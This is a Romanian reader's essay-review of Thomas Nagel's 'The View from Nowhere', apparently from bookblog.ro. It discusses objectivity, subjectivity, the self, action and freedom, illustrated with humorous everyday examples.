Înţelegerea mea oarecare m-a condus la o despărţire radicală a celor două zone. Conexiunile însă sunt multe, la fel ca şi legăturile neuronale dintre cele două părţi ale creierului, aşa că aceste despărţiri în zone total diferite nu pot fi luate decât ca model de învăţare, ca machetă de lucru. Realitatea este mult mai complexă, cu relaţii nebănuite, cu comunicaţii care scapă microscopului meu critic şi analizelor mele structurale. De aceea am compartimentat propriul meu studiu într-o zonă tripolară în care am selectat manifestările obiectivităţii, am punctat apoi formele opuse sau specifice ale subiectivităţii, iar la final am arătat rezervele generate de obiectivitate şi subiectivitate.

1.

Obiectivitatea

Are mintea un caracter obiectiv? Este o întrebare la fel de dificilă ca şi următoarea – Cum e posibil ca unul din oameni să se numească eu? Ca să pot răspunde la aceste întrebări ar trebui să mă privesc detaşat de trup şi până la urmă de orice punct de vedere. Ar trebui pe de-o parte să mă pot privi pe dinăuntru, să-mi contemplu activităţile creierului, iar pe de alta să mă ridic cumva deasupra tuturor oamenilor şi să mă percep ca o furnică oarecare ce-şi spune printre alte identităţi şi „eu”. Pentru a ne obiectiva ar trebui să ne întrebăm nu „ Ce trebuie să fac” ci „Ce trebuie să facă această persoană ” (care sunt eu).

Să-mi văd viaţa, naşterea, moartea ca lipsite de semnificaţie şi să înţeleg că exist dintr-o întâmplare norocoasă şi nu din vreun drept sau din vreo necesitate anume. Ating astfel însă obiectivitatea? Se pare că nu deoarece obiectivitatea e diferită de concepţiile particulare ale obiectivităţii. Cum este posibil acest lucru? Simplu, din cauză că ne aflăm într-o lume care nu e creată special pentru oameni .

Lumea ca totalitate e diferită de lumea ce poate fi înţeleasă obiectiv, de lumea mea, de lumea noastră, de lumea mentalului (acestea sunt doar puncte de vedere). Iată o nouă dilemă la care ne trimite să reflectăm Thomas Nagel: „ Cum aş putea să creez o teorie asupra lumii independent de percepţia mea asupra ei? Şi cum aş putea şti dacă această teorie este corectă?

Cum am ajuns într-un nivel de generalizare prematur, să privim obiectivitatea cu ajutorul instrumentelor clasice de analiză. Astfel ne obiectivăm în mai multe etape: percepem acţiunile lucrurilor, le înţelegem proprietăţile şi le identificăm natura.

Să vedem şi cum este imaginată lumea obiectivă conform lui T. Nagel: e lipsită de centru – omul ca şi Terra este un obiect printre miliarde de corpuri, prin urmare nu deţine o poziţie privilegiată; este o lume raţionabilă care poate fi comunicată prin cifre şi care nu conţine puncte de vedere.

Obiectivitatea ne face să ne dăm seama că nu există ceva care să fie considerat unic în structura corpurilor noastre, e de ajuns să vorbim doar de aspectele lor chimice şi fiziologice. „ Eu sunt o întâlnire de baze şi acizi”. Se propune o continuare teoretică în care ar apărea posibilitatea de a construi un corp viu din absolut orice material (deoarece oricum este alcătuit din atomi).

Să notez câteva comentarii apărute în urma lecturii zonei obiective – o consecinţă până la urmă amuzantă – mi-aş putea reconstrui corpul din propria mea statuie.

Să amintesc şi faptul că spaţiul fără centru în carte apare ca existent tot timpul fără a se menţiona şi tendinţa făuririi unui centru. Ori toate acţiunile umane gravitează în jurul unor centre de putere şi protecţie (casa, oraşul, ţara). Convenţionalismul lor apare doar din perspectivă temporală, istorică. Primul centru al mentalului de pildă, este chiar creierul. E interesantă ideea unui univers fără centru, dar asta ar însemna să-mi consider toate acţiunile aleatorii. Faptul că am apărut dintr-o şansă infimă ori că toate acţiunile mele sunt la fel de pline de hazard e un aspect care poate fi discutat contradictoriu. Convingerile mele apar ca absurde, viaţa mea nesemnificativă. Obiectivitatea zice că eu nu sunt mai important decât oricine altcineva. De aceea şi caritatea devine un act absurd: „Dacă nicio viaţă nu are sens prin sine, cum ar putea căpăta prin devoţiune faţă de vieţile altora fără sens?

Obiectivitatea a generat în cartea lui Thomas Nagel discutarea printre altele a modului cum se realizează cunoaşterea, a unei descripţii sumare a sinelui, a înţelegerii rolului acţiunii şi a variantei sale superlative – libertatea.

1. Cunoaşterea

Conţine în finalitatea sa una din următoarele trei tipuri de atitudini – scepticismul, reducţionismul sau eroismul

* Teoriile sceptice – sunt cele mai frecvente. Convingerile ştiinţifice sunt extinse nejustificat şi nu mai pot fi apărate în faţa îndoielilor şi greşelilor inerente. O poziţie sceptică clară este exprimată de filosoful Kant care afirma că suntem capabili să înţelegem lucrurile doar cum ne apar ele, nu cum sunt ele în sine, adică esenţa lucrurilor este inaccesibilă cunoaşterii. Mai mult Kant consideră că lucrurile în sine transcend toate aparenţele sau conceptualizările posibile. Este exprimat aici scepticismul cunoaşterii absolute.

Scepticul merge direct la absolut. Cu el nu merge conceptul de full option.

Oricâte atribute i-am da unui lucru, totuşi nu-i vom cunoaşte esenţa. Oricât de abili am fi în a-l construi, lucrul în sine va fi mult diferit şi în parte necunoscut de ceea ce am mânuit noi din componentele sale.

De altfel în orice acţiune există de la început perspectiva scepticismului (a eroziunii credinţei). Mi-amintesc că am cunoscut un tip care zicea că nu se scula din pat dacă nu urma să câştige 2-3 milioane pe zi. Din câte am înţeles cele mai multe zile le petrecea în pat, sub plapuma sa sceptică.

Îndoiala radicală neagă posibilitatea obţinerii oricărui fel de cunoaştere, libertate sau adevăr etic, deoarece suntem limitaţi de condiţia umană şi de imposibilitatea de a ne recrea de la zero. Probabil un asemenea scepticism implică perspectiva de pe vârful unui munte unde oamenii apar ca nişte furnici nesemnificative. Sunt menționați şi criticii scepticismului care invocă posibilitatea verificării cunoştinţelor, existenţa unor referinţe sau a unor principii de filantropie.

Cumva scepticismul extrem este caracteristic leneşului din povestea lui Ion Creangă care la sfârşit după oferta de supravieţuire abia îşi mişcă gura cu o replică de genul: Ce să ne mai batem noi capul cu viaţa asta!

* Teoriile reductive – în zona lor nu există convingeri, ci doar puncte de

vedere. Cunoaşterea este un fel de explorare mereu mai profundă a gratiilor cuştii mentale; de pildă Strawson punctează diferenţa dintre modul cum ne apar lucrurile la un moment dat şi modul datorat unei optici superioare sau unei analize amănunțite. Una este să vorbesc despre lene din perspectiva unui cititor a lui Creangă, alta să scriu Ghidul Leneşului aşa cum a făcut-o Tom Hodkinson. Reductivul consideră paradoxal că înţelegerea lucrurilor are un curs progresiv – înţelegem mai mult decât predecesorii noştri datorită tehnicii ori gândirii avansate. Înţelegerea precum universul este în expansiune: învăţăm nu doar cum să răspundem întrebărilor mai vechi, dar şi cum să putem pune altele noi; Totuşi, criticii lui Strawson vorbesc de posibilitatea ca lucrurile în sine să conţină şi realităţi despre care nu vom putea formula niciodată întrebări indiferent de gradul de evoluţie. Adaug şi eu că s-ar putea în goana după cunoaşterea tot mai aprofundată să omitem o serie de lucruri care au fost asimilate în trecut. Leneşul de azi este diferit de cel din cartea lui Ion Creangă. Nu-mi dau seama dacă este un progres între leneşul care stă în faţa unui calculator sau citind toată ziua ziarele şi leneşul care aştepta să-i cadă para mălăiaţă în gură.

Reducţionismul prin urmare are o poziţie melioristă, cunoaşterea poate fi îmbunătăţită cu fiecare generaţie, apar întrebări noi, răspunsuri la vechi dileme, există progres. Cred că reducţioniştii refuză să considere lucrul în sine şi sunt interesaţi doar de formele sale de manifestare.

* Teoriile eroice (cu o denumire clar nepotrivită) admit prăpastia între convingerile

despre lume şi conţinutul acestora, deşi prăpastia e plină de „ cadavre epistemologice” – de pildă teoria formelor sau doctrina reminiscențelor a lui Platon. Între cunoaşterea lucrului în sine şi a lucrului din lume nu poate fi imaginată o punte stabilă. Mai mult, majoritatea descoperirilor doar aduc cunoaştere, fără să implice fundamentul relaţiei noastre epistemice cu lumea. Este aici vorba de omul care se amăgeşte printr-o dimensionare nepotrivită a celor din jur. Un prieten de-al meu are întotdeauna numai cunoscuţi extraordinari, oameni minunaţi, nepreţuiţi, fantastici. Îi cunoşti şi dai din umeri sceptic. Nişte ăia ca oricare alţii. O măslinăreasă de la Carrefour vindea numai marfă de giganţi – avea măsline big, giants, supergiants, mamouth… Eroul trăieşte în Ţara uriaşilor văzută de Gulliver.

Se spune că realismul (acum poate fi înţeles ca o teorie reducţionistă) este o poziţie care ne ajută să înţelegem şi lucrurile pe care nu le putem înţelege – ex starea de a fi liliac. Realitatea poate fi imaginată ca un set de sfere concentrice care sunt revelate pe măsură ce ne desprindem de contingenţele sinelui. Ne ducem înspre realitate prin intermdiul unor obiectivităţi tot mai generale. Dar asta nu înseamnă că atingem lucrul în sine sau că-l putem epuiza. Mă gândesc că străbaterea multor cercuri concentrice presupune deja un traseu şi aduce cu sine ignorarea explorării deschiderilor pe care le generează un anume cerc. De pildă şcoala care vrea să dea cât mai multă informaţie nelăsându-l pe tânăr să se oprească la o anume materie pentru aprofundare. Înainte de începerea facultăţii să-şi ia gândul de la aşa ceva sau riscă să fie eliminat de la studii.

2. Sinele pare foarte pur dintr-o perspectivă interioară şi fără legătură logică cu orice altceva, mintal sau fizic; nu i se poate capta esenţa şi nu există încă metode de înţelegere a sinelui; să reamintesc totuşi de convingerea carteziană că sinele poate fi pe deplin revelat prin introspecţie, convingere auzită mai ales la cei care nu sunt atenţi la nuanţele sale; nu ştim dacă sinele rămâne identic după ce se confruntă cu două experienţe diferite. Sunt oare tot eu persoana care râdea de moarte şi acum nu mai pot zâmbi fiindcă mi-a murit cineva foarte apropiat. Prima experienţă era obiectivă. Moartea este un dat. A doua se dovedeşte subiectivă. Moartea este o catastrofă care nu trebuie să mi se întâmple mie.

Sinelui i se poate concepe migraţia de la un corp la altul, deşi practic operaţia nu e posibilă. Mă gândesc cât loc e aici de Sf-uri cu păstrarea sinelui în alt corp, de carne sau metal.

Sinele generează senzaţia că parcă ştiu ce înseamnă cuvântul „eu”. Sunt cât pe-aici să mă cunosc,dar îmi stă pe limbă. Şi din păcate nu pot emite decât o tautologie de genul „Eu sunt X”.

Putem spune că sufletul este forma obiectivă şi autonomă a sinelui. De altfel obiectivarea sinelui presupune transformarea lui„eu” în „cineva/ceva”, fie acesta şi sufletul. Nu mai zic „ eu sunt leneş”, ci „ X este leneş” ca şi cum ar fi vorba de un altul.

Să menţionez şi faptul că creierul este esenţial sinelui şi de aceea o declaraţie corectă este: „ eu sunt creierul meu”. Totuşi Nagel îşi exprimă rezerva prin faptul că creierul nu garantează dacă vreunul din centrele conştiinţei existente la un moment dat îmi aparţine sau nu. Nu poate fi în acelaşi timp şi proces şi obiectul procesului.

Sinele poate fi închipuit ca o sumă de predicate mentale, „ eu sunt mulţimea”. Ne dă senzaţia că suntem mulţi într-unul, ne extinde ce e drept puterea înţelegerii, dar ne aduce şi îndoielile, respectiv ne măreşte gradul de nesiguranţă. Trebuie reamintită imaginea lui O. Neurath despre sine care considera că ne aflăm pe o mare agitată unde nişte marinari încearcă să-şi reconstruiască vaporul, bucată cu bucată. Imagine care duce spre un scepticism profund. Ajung oare vreodată marinarii să facă un vapor al sinelui impozant?

3. Acţiunea

Iniţial T. Nagel o defineşte ca orice mişcare care nu e involuntară. În consecinţă pare să nu existe acţiune în lumea neurală, a reacţiilor chimice, a reacţiilor corpului. Stând sub semnul voinţei, acţiunea ar trebui considerată o categorie mentală întrucât ne conştientizăm propria acţiune în raport cu acţiunile altora. Acţiunea ridică problema liberului – arbitru. Facem ceea ce dorim, prin urmare cum spunea Brian O Shaughnessy noi ca subiect experimentator ne transformăm în subiect al acţiunii; dacă însă ne privim dintr-o perspectivă exterioară, părem să fim înghiţiţi de circumstanţele acţiunii; nimic din ceea ce reprezentăm nu poate interveni pentru a controla aceste circumstanţe; tot ceea ce facem constituie o parte din ceva ce nu facem, dar care totuşi se petrece; avem impresia că suntem autorii propriilor noastre acţiuni, dar de fapt acţiunile noastre sunt determinate cauzal. S-ar putea ca leneşul ori măslinăreasa de mai devreme să nu-şi fi putut controla decât o mică parte din acţiunea propriu-zisă. Unul nu poate prevedea ce vor face sătenii. Azi leneşii nu se mai spânzură de pildă. Cealaltă nu poate să ştie dacă denumirile măslinelor sale vor da clienţilor motive destul de puternice pentru a le cumpăra.

Nu putem explica inteligibil de ce alegem să facem sau nu o acţiune în loc să alegem alternativa. Nu lămureşte de fapt nimic propoziţia că aşa am avut chef. De altfel putem judeca responsabilitatea cuiva conform alternativelor pe care le-a avut disponibile: fapta este privită ca o alegere din spectrul de posibilităţi. Măslinăreasa ar putea da după clienţii care n-o bagă în seamă cu măsline stricate. Fiecare îşi are propria individualitate şi alternativele lumii nu sunt şi alternativele sale. Într-o zi, sper, va veni un client care va primi o măslină stricată în cap în ciuda oricărei norme de comportament a supermarketului.

Oricât aş încerca să mă cunosc nu pot ieşi total din mine, nu mă pot privi total obiectiv. Se pare că procesul de cunoaştere a sinelui ca o formă de lărgire a libertăţii duce la distrugerea ei. La sfârşitul cărării care pare să ducă spre libertate şi cunoaştere pândeşte scepticismul şi neputinţa. Măslinăreasa ar putea să-şi abandoneze postul enervant şi să fie liberă. dar va fi fără bai, fără măsline, ba chiar şi fără identitate.

În ceea ce priveşte libertatea să notez şi că o fiinţă raţională nu vrea doar să acţioneze liber, ci şi să analizeze motivele, raţiunea şi valorile ce-i influenţează alegerile. Ne dorim nu numai să facem ce vrem, ci şi să fim aşa cum vrem să fim. Să menţionez şi eu alături de gânditorul englez formele comune de limitare a libertăţii – prejudecăţile diferite; iraţionalitatea; obtuzitatea, frica.

2.

Subiectivitatea

Este structurată în jurul unei concept denumit zona mentalului. Am încercat să extrag informaţii privitoare la acest loc misterios, dar am constatat că sunt puţine şi mai ales îndreptate înspre obiectivitate.

Ce este sinele? Doar un punct de vedere personal? Ar fi bine să adăugăm şi punctul de vedere al altor entităţi, similare sau diferite de noi? Să nu omitem nici tipurile de judecată? E un fel de aluat cu o mulţime de ingrediente sau o suită de cercuri tot mai largi, unele interioare, altele exterioare. În orice caz sunt folosite concepte empiriste pentru descrierea sa.

Mentalul după Thomas Nagel este o trăsătură generală a lumii în care noi am fi doar simple ipostaze nici măcar centrale; Mintea mea ar fi doar un exemplu de fenomen mintal, doar unul dintre punctele de vedere posibile. Problemele mentalului legate de cum pot fi eu o anumită persoană se pot rescrie ca întrebări astfel: Care din toţi aceşti oameni pot fi eu? Cum aş putea fi doar o persoană anume? Aici e clar o privire dinspre obiectivitate atunci când încerc să-mi dau temeiuri de existenţă propriului meu sine.

Teoriile asupra mentalului nu pot fi exhaustive şi de aceea pentru a fi oneste trebuie să-şi arate gradul de incompletitudine, respectiv să menţioneze că sunt lucruri şi evenimente pe care nu le cunoaştem încă.

Autorul propune o teorie preluată din fizică – o viziune atomară a mentalului. Se întreabă „ ce proprietăţi ar trebui să deţină atomii pentru a fi consideraţi entităţi protomentale ce ar da naștere stărilor mentale”. Ne trimite spre lumea microscopică, cea care aduce realităţii faptului mii de actanţi invizibili: „ oare un eveniment mintal presupune nenumărate evenimente protomentale mai mici (un fel de atomi mentali) ”. Totuşi nu există posibilitatea de a construi subiectivitatea din „ 200 de livre de particule subatomice”. Dacă evenimentul mintalar putea fi constituit dintr-o suită de proto, de ce totuşi nu am putea imagina şi aranjarea subatomică într-o formă numită fiinţă? Totul e să descoperim în ce condiţii un atom ajunge purtător de conştiinţă.

Modalităţile de manifestare a mentalului sunt amintite de câteva ori: astfel undeva se afirmă că vedem lumea în funcţie de interacţiunile noastre. Că trăsăturile subiective nu pot fi receptate de formele purificate de gândire. Rezolv un exerciţiu la mate şi plâng după iubita pierdută între măsline. Nicio legătură între acţiuni.

Sufletul e văzut ca o noţiune convenţională şi vizează zona „purtătoare a proprietăţilor mentale”. Identitatea sa subiectivă şi care nu poate fi accidentală e determinată se pare în timp de identitatea corpului care-l conţine.

Subiectivitatea generează problema alterităţii. Trebuie să accept că există şi alte minţi cu acelaşi potenţial ca al meu. Sunt de aceea înclinat spre solipsism care constă în incapacitatea acceptării altor minţi sau fiinţe raţionale. Războiul este înainte de toate bazat pe această concepţie. Nu-l pot accepta pe străin ca propriul meu egal.

Cum am spus există o privire a subiectivităţii prin intermediul criticii obiectivităţii. Ne vedem prin oglinda antitezei, deşi nu avem dovada că obiectivitatea se opune în tot domeniul ei subiectivităţii. Să nu uităm menţiunea lui Nagel – cele două stări coexistă în acelaşi individ.

Lipsurile obiectivităţii – cea mai obiectivă perspectivă pe care o putem construi va avea un fundament subiectiv neexaminat. O propoziţie care desfiinţează realismul cu toate variantele sale hipermoderne. Strawson afirmă chiar că numai ocazional putem fi obiectivi faţă de alte persoane. Hopa. Şi în rest! Ce mă fac eu cu directoarea mea! Mai mult se pare că ne agăţăm de o anumită obiectivitate pentru a evita alte atacuri obiective din viitor. Asta realizează birocraţia. Consemnează o anume obiectivitate pentru a se acoperi. Chiar dacă realitatea din jur e defectuoasă, chiar dacă lucrurile se îndreaptă spre haos, birocratul s-a acoperit. El trăieşte cu cochilia lui protectoare de hârţogar.

Gradaţii ale obiectivităţii – Un punct de vedere care este obiectiv prin comparaţie cu viziunea personală a unui individ poate fi subiectiv prin comparaţie cu un punct de vedere teoretic. De pildă moralitatea este obiectivă în raport cu viaţa privată, dar subiectivă în raport cu fizica.

Concepţii obiective care sunt influenţate de elementele mentale. Idealismul este perspectiva prin care putem identifica ceea ce există cu ceea ce putem conceptualiza, în cel mai larg sens cu putinţă. De asemenea scientismul, cel care e deghizat în cele mai multe discursuri sub mantia generoasă a realismului este de fapt o formă de idealism în care se evocă supremaţia unui anumit tip de înţelegere umană ca fiind singurul mod de interpretare a lumii; istorismul, o altă poziţie radicală susţine că nu există adevăr în afară de ceea ce este interior unui anume punct de vedere istoric.

Iată şi atacurile contra tipului de obiectivitate care priveşte otova orice formă de manifestare a viului: „ Un animal nu-şi poate supune propria natură aprobării, criticii sau revizuirii. Nu-şi poate spori propria raţionalitate. ” Sau a manierei obiective care duce lipsa de importanţă la extrem. Putem spune la rândul nostru că dacă nimic nu are vreo valoare obiectivă, atunci nimic nu are importanţă în mod obiectiv.

Problema supraobiectivării – tentaţia de a interpreta obiectivitatea raţiunilor într-un mod mult prea ferm. Iată de pildă nu suntem capabili de fapt să descifrăm mesajele unor fiinţe care nu ne sunt suficient de similare nouă; să analizăm anumite expresii fără să le fi avut (de exemplu simţuri specifice unor animale); nu ştim ce gust are omleta pentru un gândac, chiar dacă imaginăm o fenomenologie a gustului acelui gândac.

Subiectivitatea conştiinţei este una din trăsăturile ireductibile ale realităţii şi ar trebui să ocupe un loc tot atât de fundamental ca acela ocupat de materie, energie, spaţiu, timp, numere. Chiar visez la un capitol din fizică dedicat subiectivităţii. Oare în ce ar trebui măsurată? În suflet-putere!

Se consemnează şi că nu este uşor să-ţi urmezi impulsul obiectivării fără să-ţi denaturezi viaţa şi relaţiile personale. Poate cel mai bun exemplu de impersonalizare a sinelui este în cartea lui Luigi Pirandello – „ Unul,niciunul şi o sută de mii”.

O sesiune specială trebuie s-o dedicăm motivaţiilor. După cum constată Thomas Nagel motivele unei persoane nu pot fi ale tuturor; ar trebui să ne armonizăm lumea cu viziunea pe care o avem despre ea. De aceea stabileşte trei tipuri de motivaţii:

* Raţiuni ale autonomiei – dorinţele, proiectele, legăturile personale ale agentului. Au drept consecinţă realizarea unei vieţi bune.

* Raţiuni deontologice – dorinţele altor persoane de a nu se abuza de ele în diferite feluri – de exemplu încălcându-le drepturile; sunt normate de sfera eticii care însă nu poate exista fără politică (unde ni se vorbeşte de punctele de plecare, de alegerile care ne stau la dispoziţie, de consecinţele acţiunilor întreprinse şi de raporturile interumane stabilite). Se are în vedere mai ales viaţa morală.

* Raţiuni ale obligaţiei – datorate celor cu care suntem rude, prieteni, colegi şi care necesită o grijă specială. Aici se manifestă mai ales viaţa raţională.

Iată şi un posibil cod de comportament: „ O judecată de bun simţ sugerează că fiecare dintre noi ar trebui să-şi trăiască propria viaţă (autonomie), să acorde o atenţie specială altor persoane (obligaţie), să aibă în grad semnificativ preocupare pentru binele general (valori neutre) şi să se poarte frumos cu oamenii care interacţionează (deontologia) ”.

Filosofia a mizat de-a lungul timpului pe relaţia dintre viaţa bună şi viaţa morală:

Nagel a stabilit cinci alternative unde primele două sunt poziţii de nonconflict, următoarele două se arată conflictuale, iar la final este menţionată o poziţie neutră. Să menţionez şi că acest conflict poate fi rezolvat fie în sensul convertirii, fie în sensul găsirii unei forme de moralitate de tip politic.

1. Viaţa morală este definită în termenii unei vieţi bune – Aristotel
2. Viaţa bună se defineşte în termenii vieţii morale – Platon
3. Viaţa bună trece peste viaţa morală – Nietzsche sau sofistul Thrasymachos din dialogul „Republica”.
4. Viaţa morală are prioritate asupra vieţii bune – utilitarismul sau teoria drepturilor.
5. Nici viaţa bună şi nici cea morală nu au în mod consecvent prioritate asupra celeilalte.

3.

Acuzele la adresa subiectivităţii

Vin în special dinspre filosoful nominalist, Wittgenstein care consideră că procesele mentale sunt doar simple ficţiuni lingvistice. Crede că tot ceea ce îşi propune depăşirea experienţei nu are sens. Elimină printr-o astfel de poziţie printre altele limba vorbită de o singură persoană sau acele lucruri despre care nu se pot emite judecăţi. Crede că sensul sub forma acordului apare numai în cadrul unei comunităţi. Să observăm totuşi că acordurile limbajului cuprind doar o parte limitată a lumii; există acorduri care se referă doar la ele însele fără nicio referire la realitatea exterioară.

Prin urmare conform lui Wittgenstein ar fi o eroare adăugarea mentalului ca un nou capitol în fizică. Că mai degrabă ar trebui să vorbim de acorduri şi proceduri juridice. Că unul care bălmăjeşte pe limba lui de fapt nu comunică nimic. Că scriitorii neînţeleşi de contemporani nici nu au şansă în viitor să se impună. Recunoaştem aici scepticism şi o formă de realism extremist.

Să menţionez şi alte atacuri venite dinspre alte zone decât cele wittgensteiniene. De pildă se sugerează că subiectivitatea ar genera pericolul unei deviaţii de genul scepticismului, idealismului sau solipsismului. Cum s-ar putea evita deviaţia? Am ajuns cumva să cunoaştem lucrul în sine între timp! Am căpătat instrumente obiective cu care să măsurăm ori să recunoaştem subiectivitatea!

Să amintesc şi de faptul că o declaraţie de tipul „ eu sunt X” e adevărată doar dacă e rostită de X; orice traducere a propoziţiei implică noţiunea de eu, deşi vorbitorul nu ştie cine este cu adevărat: ce altceva aş putea fi eu în afara unei anumite persoane?

Iată şi o un exemplu extrem de obiectivism, forma tare de antiumanism – lumea nu ne aparţine nici măcar potenţial, este parţial de neînţeles din cauza lipsei timpului, lipsei abilităţilor tehnice, structurii noastre intime. Cât de diferită e propoziţia asta de noţiunile noastre teritoriale ori legate de proprietate!

Probleme comune

Subiectivitatea are problema detaşării, obiectivitatea are problema integrării.

Nu se poate face o disjuncţie clară între suflet şi trup. Dacă punctele de vedere sunt trăsături ireductibile ale realităţii, atunci nu există motiv pentru care ele nu ar aparţine unor trupuri fizice”.

Concluzii

Perspectiva de nicăieri” este o carte dificilă pe care nici s-o deschidă cei ce nu au călcat niciodată prin tărâmurile filosofiei. Cartea asta este până la urmă un alt eşec de cunoaştere a sinelui care aduce totuşi o suită de instrumente, un entuziasm, deschidere şi bunăvoinţă.

Oare de ce nu s-o da şi premiul Nobel pentru filozofie? Sau înţelepciunea ori cunoaşterea sinelui sperie!

Autorul este obsedat să nu-şi trivializeze ideea. Să fi lăsat de înţeles că orice altă preocupare este trivială! Eu cu acest articol să-i fi trivializat ideea prin exemple nepotrivite. Sau dacă ne coborâm din tărâmul generalităţii, ajungem fără şansă de scăpare contaminaţi de trivialitate. Thomas Nagel m-a făcut să simt că până la urmă orice efort al nostru nu înseamnă decât o tatonare de obiecte. Scriem cărţi de filozofie pentru a lupta măcar o vreme contra incertitudinilor continue. Suntem aidoma copacilor. Ne ţinem mugurii prudenţi multă vreme contra posibilelor intemperii. Dar până la urmă vine o clipă când nu te mai poţi ţine din înmugurire. O faci indiferent de cum arată lumea. Nu-ţi mai poţi permite să aştepţi. Apoi, pe deplin înflorit, aştepţi vagi admiraţii, contrapuncte exclamative. Urmează un torent de critică şi indiferenţă. Şi lucrul în sine rămâne la fel de nevătămat pe Muntele cu măslini.

Ceva de genu`

Gabriel Adrian Mirea

articol publicat prima oara pe bookblog.ro la adresa http://www.bookblog.ro/x-gabriel-mirea/perspectiva-de-nicaieri/

"));